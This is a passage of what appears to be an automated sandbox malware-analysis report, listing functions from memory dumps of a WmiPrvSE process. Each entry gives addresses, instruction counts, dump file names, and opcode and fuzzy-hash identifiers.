              • Opcode ID: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction ID: 5002979ba6e299cc6a06d51626494ac9fdb32efe9d9c394f3edf2575b63b1565
              • Opcode Fuzzy Hash: b8c6ef45a34945ef6e4549cde486bf03ad087c04fa943c60f5a2ddc2cddbc8a9
              • Instruction Fuzzy Hash: 883182B4D1462D8FEB54EBA8C885BADB7B1BF59301F504179D50CE3292CA346989CB41
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3A0E1 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction ID: 9feaa4c547310433195256117bd6ee29482a3852471b79050fe55059d557340d
              • Opcode Fuzzy Hash: 4ae8102400916175b87556d3f84de9e2a6311a3d752cd3017ca1e1db53ec05a4
              • Instruction Fuzzy Hash: B02181B0918A4D8FDB89EF68C4995ED3BF0FF68305F0101AAE819D7291DB35E445CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41930 Relevance: .1, Instructions: 75COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction ID: fa062428aad86762b747d4f688cf0183a214b3d6b4a9f1b982bf6c7bfbd65511
              • Opcode Fuzzy Hash: 231f96e892407b2accb547d655471bce5c3584c1d8fae775a27747e763f72633
              • Instruction Fuzzy Hash: 5D2196B188E3C94FDB579B708C695E53FB09F17200F0940EFD48AC74A3D9695559C352
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42BC0 Relevance: .1, Instructions: 68COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2a3ca635dbc39339b8735e27e664c8d76de4d25c766a74bcfe2a23dc7c8f84ec
              • Instruction ID: 53539a138fedbab04dfb79b043160a5bfc48ffa4b121fba10de2470bd544123e
              • Opcode Fuzzy Hash: 2a3ca635dbc39339b8735e27e664c8d76de4d25c766a74bcfe2a23dc7c8f84ec
              • Instruction Fuzzy Hash: B7116D7091892E8FDF58EFA8D4996FE77A1FF58300F50043AE50AE2191DE75A445CB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41BB1 Relevance: .1, Instructions: 67COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction ID: 97aab76922bf6f5b0fb20602f16ba8f14fe87ef5ac5c4903b9d4e075d71d7ab3
              • Opcode Fuzzy Hash: 3866ea5e7d0c7469ed2355cc827e00d2b4a51bbf2d2bfbfdced76581a5440315
              • Instruction Fuzzy Hash: 581179B09596498FDB49DF28C8995E93BA1FF58304F0142BEE84AD3291EB35A494CB81
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46331 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction ID: 7c0d68c2cd5d9ea8aa1f6c346e5ff328686f4d686951d6236e90ab459b7b2a38
              • Opcode Fuzzy Hash: 584e3d3eb24bf37bbc8d5f0658cbede96d97f0a1fcd91f5326b7c662ed16b2a7
              • Instruction Fuzzy Hash: 0D11AFB4908A8E8FDB89EF78C8992B97BA1FF58311F1005BED809C2292CF35A544C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43B45 Relevance: .1, Instructions: 66COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction ID: 886b1efba4315ee4aebc1f0ab244ca789586775e4313fe344aafcef0bd295379
              • Opcode Fuzzy Hash: 1ed24e44789bb20744eeb89d1e2a602962953d902343f14fbf114b8c2828a7d9
              • Instruction Fuzzy Hash: BD11AFB0819A4E8FDB99EF78C4992B97BA0FF58311F4005BED819C2592CF35A148C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF43AA9 Relevance: .1, Instructions: 65COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction ID: cf2021944e8f5be867ec2d966e2432d721202ca69d83c7502a87c0e177ff1b19
              • Opcode Fuzzy Hash: e8e6cc0feecb8e3fed4549af64f33673a85586b811fe9bbaa270c1e7984d6c85
              • Instruction Fuzzy Hash: 4F21D2B490964E8FDB89EF78C4992B97BB0FF58300F0005BED809C6192CA35A449C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF41DBC Relevance: .1, Instructions: 63COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction ID: dcc742b9d05090b02d96b7b7bfdc832f090273b5f3bede53be148adac1e2e3ba
              • Opcode Fuzzy Hash: 039639f4a2dcd669346a8d9a5ef3a014755c45caff3f6e38d04b788ebd0524c1
              • Instruction Fuzzy Hash: 1D11E6B484E68D4FEB0ADB70C9696F93BB0EF06300F0540FBD809CB093DA29A549C311
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30D0D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction ID: cb40735d4d463c84beb9f77463ef18138cfcec19adbd0e946531b0dc6e5a51a4
              • Opcode Fuzzy Hash: 32b37fe1f473381e9ca380b78250e1915d326c5086352b47da8f0bf03c1337f5
              • Instruction Fuzzy Hash: C211BBB181964DAEEB9ADB78C8593F87BE0EF59310F0004BBC819C6692CE26A448C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4448D Relevance: .1, Instructions: 61COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 9cd35986fff3457e7ab780c1c78312729c2fe543268c02c1a95538fdae83159e
              • Instruction ID: dee9b2d48b4855270bf4c7a05077ec7b644b98aacf5b55ad8bbb75cf0e5dd5e8
              • Opcode Fuzzy Hash: 9cd35986fff3457e7ab780c1c78312729c2fe543268c02c1a95538fdae83159e
              • Instruction Fuzzy Hash: D211BFF1D19A1E4FE791EB78C99D2BD7BE0FF48300F4509BAD809D60A2EE35A4488750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF447CA Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c007aea575afc7d11db1b489032ebef60476da7bce9b8d230919480dca43c402
              • Instruction ID: ecc93fc77e1399364d6e902c31581b3382cd4a458e45deec85a3e02d60aa3d2c
              • Opcode Fuzzy Hash: c007aea575afc7d11db1b489032ebef60476da7bce9b8d230919480dca43c402
              • Instruction Fuzzy Hash: 00119EB4E0995C4FDF90EA78C8897ECBBE1FB59310F5041AAD41DE3242DE35A8858B40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF443F9 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction ID: 9e937c5b94f344de38acc49037199675aa4b97f4e2a265bf690c2e7f8d7d2048
              • Opcode Fuzzy Hash: ac69bc1f1725959d58ff61cbac8777deb39384d6c3a502596636f5c4144eef6c
              • Instruction Fuzzy Hash: CC118EB090968E4FEB4AEB74C8A92B97FA0EF15301F4404BAD80AD61A2DE25A448C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420D8 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction ID: c8e7d4e9e3800781064cf8bada850aaf07b4e24a997123dd8a37fd85649ba678
              • Opcode Fuzzy Hash: c4a040e06d23ff1fae05a686da155d6f6be81e1d8ddc238169cd8619a11491b6
              • Instruction Fuzzy Hash: 100108FA94D55A8BE751AB7CD8991F93B90EF84311F0504BBCE48C6082DB25E45D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF40561 Relevance: .1, Instructions: 60COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction ID: ab8501e8258bebf47586730fc98faa7fd2ee9d42b05ab4796232007d9db44875
              • Opcode Fuzzy Hash: 39c71de8a619f7d1d501c77110a8bca6889722eea790d9846ee4cf1805847171
              • Instruction Fuzzy Hash: E011A1B0809A4E9FEB95EF78C49D6BE7BE0FF18301F4004BAD819C6191DB35A554CB00
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF30AED Relevance: .1, Instructions: 58COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a5b7aa3994fef7d77e99e4e1960b9fcc4e48827bf56536d894074c8ec5bd775b
              • Instruction ID: 1667fb8e7146cc2928d0f301e405b7f332c2925964b6980d0322fa5a26a964c5
              • Opcode Fuzzy Hash: a5b7aa3994fef7d77e99e4e1960b9fcc4e48827bf56536d894074c8ec5bd775b
              • Instruction Fuzzy Hash: 2D1160B5A0990D9FEB55EB64C895BEEB3A1FF54301F10427AC40AD7295CE38A985CB80
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E8 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction ID: 81410040e2cc9ac0a75015fd9d379b36759b915387cccbd37832b13dd59051bb
              • Opcode Fuzzy Hash: 047ec21ff65a2130e95be79e5b40b4bc9445de3ea80c5bf950eda2e067eb00ae
              • Instruction Fuzzy Hash: A2118FB890890E8EEB89EF78C8992BD77A0FF58304F50057AD81DC21A1CE35A144C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF456F9 Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction ID: 91404cfc6f09b306eb7b9ebf595267914b421c81156507de46a5269a87804e7a
              • Opcode Fuzzy Hash: 09d4e906c955b642e8b709fbfbd40d1134669553ab3b177616b602e1005133d3
              • Instruction Fuzzy Hash: FE119EB0D0D68E8FEB52EB78899D2A97BF0EF15311F4505B6D808C71A2EA28A548C751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4410D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction ID: 22b25b207495c50c52958fed7017556e46a995f832e15f6aae9151e21e392e55
              • Opcode Fuzzy Hash: 101aa80a0b27e71350da420094a1a6c93fa30aa06f5e0e209a6556746e05dbef
              • Instruction Fuzzy Hash: BA119DB080964E8FEB9AEB74C8992BA7FE0FF68300F0105BAD41AD6192DE35A544C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4658D Relevance: .1, Instructions: 57COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction ID: 4cb9aef0538e00d7ed007f2dda380c78ba22e8bec2e57d7a12efbbba1d25d455
              • Opcode Fuzzy Hash: 7fd3c2dbf34dea908a52b403b593edbdb5ddd4a293ddda0d43a0daf63997ff50
              • Instruction Fuzzy Hash: CE11E3B490964E4FDB59EF34C8A92B97BA0EF58310F4441BED80DC6192DE36A548C741
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46AD1 Relevance: .1, Instructions: 56COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction ID: 92bb43a1ccf4e3b74d07045cdfb31cc740c42cf64a6509571c392eacc840dee5
              • Opcode Fuzzy Hash: 1bb64bb9c4c87597806d0ff18384fa8b698ff4fa7e2d8bb6a82011d3b1c7b2e8
              • Instruction Fuzzy Hash: 19117CB490995E9FEB42EB74C98C5AA7BE4FF19301F0044B6D808C70A1DE39E184C760
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3BC69 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction ID: 18fd796cf0204ab3ca3744f202e878b278fba5400f0228a8eae9a3c7f52470cc
              • Opcode Fuzzy Hash: 92b9cb1cca3807886b8662a0a8a71eff989c569741f8778f7e3dc6c58c604a49
              • Instruction Fuzzy Hash: 88115EB090964D9FEB96EB74C8AD1F97BE0FF69301F4004BAD819C6292DE76A944C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF33415 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction ID: b915e73ca4709b0d59b4b31f32d30043e5da4872d32e8f4e8084e10ae3b5ffc6
              • Opcode Fuzzy Hash: 96d1402e592a245b426925129bbc6c48a8547b7ec141e63babe986053fb0ec37
              • Instruction Fuzzy Hash: 8C118EB090965E9FEB9AEF78C8581FD7BA0FF18301F4005BED829C6292DB35A449C700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF42A75 Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction ID: 8d0394d69e4a2777d1cbba06dbb3ae40115aaaa53bcc453de133c5efa0ca2ca0
              • Opcode Fuzzy Hash: a110d1ac3144bdb07dcb3d4071750b072dd3b09f5cd3ca6e7c1ccab694a11164
              • Instruction Fuzzy Hash: AC11A1B4D1954E8FE765EB78C99D2BA7BE0FF14300F4505B6E81CC6092DE24E5488751
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF4436D Relevance: .1, Instructions: 55COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction ID: 4b90bac8c97b78c974894e8c7880e294cdf66a0ea23811b9e4c1adfbb08f679e
              • Opcode Fuzzy Hash: 068a23d0eab3bc9f5c3357c625bc35d29ae769b321fe2df6c8f9ebcd66b6e36b
              • Instruction Fuzzy Hash: 9C11E0B0918A8E8FDB4AEB74C85D2B97BE1FF18304F0009BAD81AD6192DF35A558C711
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3C069 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction ID: 63cc6e77d7a794f5e72f9b2c253970c1a4c6d05e12a2c545fa37457fff066987
              • Opcode Fuzzy Hash: f002f6936c7259e973a27240ba62cbbb6669ac1f5208a90d373e5e44736d77ad
              • Instruction Fuzzy Hash: 231102B580968D9FDB8AEF34C4581F93FA0FF59300F1002BAD419C7192CA39A948C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3B895 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction ID: a24fc5ec2e226362981354c551465a9f425ce8f7329c38831ae4880f96b055f2
              • Opcode Fuzzy Hash: 749d607b0bae25d5b1d3d047185ecf067acdcb58c7c6cbe04dfc87f23086e36f
              • Instruction Fuzzy Hash: D1117CB090A64D9FEB99EF78C46D2F97BA0FF18301F0004BED819C6291DA36A545C740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF420E0 Relevance: .1, Instructions: 54COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction ID: d2ef2b2d0beb04f4874b9e8f834a69c170ad4330d490ab20428622fa6ad40d27
              • Opcode Fuzzy Hash: 22cd9073782e8a07bff055e9ecb59247898411ecc17ecad0ef6e30853b19c06d
              • Instruction Fuzzy Hash: 1901F5F994D55E8AF762AB78D89E1F93BA0EF84311F0504BBDA08C6082DA25E44D8780
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF3ABA5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465608515.00007FFBACF3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF3A000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf3a000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 5cbe7143fcb9067a2387701425cc8a0ff1a482f7bfe2d2c9bfa54f8862164d85
              • Instruction ID: b1f430c28501b7b4d00fc004c9e71394082f73bddd8b4a4a0b3d18220973bbfb
              • Opcode Fuzzy Hash: 5cbe7143fcb9067a2387701425cc8a0ff1a482f7bfe2d2c9bfa54f8862164d85
              • Instruction Fuzzy Hash: 920169B081964A9FE752EBB5C84D5E97BE1EF59300F0015B6D828D62A2EA29E4988740
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF32D61 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465279844.00007FFBACF30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF30000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf30000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction ID: 2ec292b508e0f3ab2b64da4d1e8560cacadaf15fe3135089e1fac3a9e4441659
              • Opcode Fuzzy Hash: d1245028d8804796a223a30ac0baa8140cfeaea2574e600a66dc10280d78b9ba
              • Instruction Fuzzy Hash: B301DFB0D1965E5FE7A2EB38C44C6E93BE0EF59300F4104B6D828C62A2EE38E5488700
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF463D5 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction ID: 29f1f63dafe536d0f353ae5052825cca3ed96a02e1b39593654b3b3452c4a947
              • Opcode Fuzzy Hash: 91a877ddef98c7ef9bd340c0a2e6c401b2a77e0322cf6c12bdfbe889f8e0c93c
              • Instruction Fuzzy Hash: 8401A1B890968E8FEB99DF78C8592B93BA0FF54300F40057AE80CC25A2DB35E548C781
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF46F99 Relevance: .1, Instructions: 53COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction ID: 7dc391bf582cb835aa2fa533c451d6fb17ac3286ba50237ecdd50e19c32961b4
              • Opcode Fuzzy Hash: 96e653f96e7332767fa564436489aa495f201240d7ac874a212733b21a75286b
              • Instruction Fuzzy Hash: 2C118EB481965D8FEB4ADB74C8991B93BA0FF15311F4004BAE859C6192EA3AA918C750
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00007FFBACF473E1 Relevance: .1, Instructions: 52COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000016.00000002.465739301.00007FFBACF40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACF40000, based on PE: false
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_22_2_7ffbacf40000_WmiPrvSE.jbxd
              Similarity
